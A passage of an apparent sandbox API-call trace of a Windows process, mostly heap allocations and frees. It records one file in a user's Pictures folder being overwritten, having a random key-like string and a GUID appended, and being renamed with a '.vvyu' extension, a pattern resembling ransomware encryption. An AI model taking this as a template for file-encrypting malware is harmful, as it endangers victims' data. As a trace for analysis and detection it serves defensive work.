Size=0x4) returned 0x2c37850 [0193.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.460] GetCurrentThreadId () returned 0x264 [0193.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ef8 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f58 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f70 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f10 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ee0 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42028 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.471] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x6215, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x6215, lpOverlapped=0x0) returned 1 [0193.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.472] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x621a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.472] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.473] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.473] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.473] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.474] CloseHandle (hObject=0x584) returned 1 [0193.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0193.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0193.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0193.475] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\QjVfzvvW_idBuK5j3vJ1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\qjvfzvvw_idbuk5j3vj1.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\QjVfzvvW_idBuK5j3vJ1.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\qjvfzvvw_idbuk5j3vj1.gif.vvyu")) returned 1 [0193.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.477] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.481] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce2ba10, ftCreationTime.dwHighDateTime=0x1d8a1f9, ftLastAccessTime.dwLowDateTime=0x164b5600, ftLastAccessTime.dwHighDateTime=0x1d8a429, ftLastWriteTime.dwLowDateTime=0x164b5600, ftLastWriteTime.dwHighDateTime=0x1d8a429, nFileSizeHigh=0x0, nFileSizeLow=0x621a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QjVfzvvW_idBuK5j3vJ1.gif", cAlternateFileName="QJVFZV~1.GIF")) returned 0 [0193.481] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0193.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.482] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0193.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0193.482] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0193.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 